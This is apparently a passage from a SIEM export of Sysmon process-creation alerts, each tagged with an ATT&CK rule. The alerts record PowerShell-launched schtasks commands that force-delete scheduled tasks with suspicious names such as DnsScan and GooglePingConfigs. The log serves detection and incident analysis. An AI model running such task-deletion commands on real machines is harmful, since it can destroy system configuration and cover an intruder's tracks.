12:52:41.345\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001002613100}\r\nProcessId: 5728\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.345"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001002613100}"",""processId"":""5728"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.600",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.246 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010e15e3100} +ProcessId: 4032 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.270669300Z"",""eventRecordID"":""3972"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.246\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010e15e3100}\r\nProcessId: 4032\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.246"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010e15e3100}"",""processId"":""4032"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.563",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.139 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ca5c3100} +ProcessId: 7356 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.161304200Z"",""eventRecordID"":""3971"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.139\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ca5c3100}\r\nProcessId: 7356\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:41.139"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ca5c3100}"",""processId"":""7356"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.544",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.100 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ed5a3100} +ProcessId: 7816 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.106341400Z"",""eventRecordID"":""3970"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.100\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ed5a3100}\r\nProcessId: 7816\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.100"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ed5a3100}"",""processId"":""7816"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.529",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.063 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-00103d593100} +ProcessId: 300 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.067393200Z"",""eventRecordID"":""3969"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.063\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-00103d593100}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.063"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-00103d593100}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.514",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.013 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001055573100} +ProcessId: 2992 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.015479200Z"",""eventRecordID"":""3968"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.013\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001055573100}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.013"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001055573100}"",""processId"":""2992"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.497",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:40.874 +ProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f3543100} +ProcessId: 5016 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:40.895373300Z"",""eventRecordID"":""3967"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:40.874\r\nProcessGuid: {df9fc3d3-b418-5ecf-0000-0010f3543100}\r\nProcessId: 5016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 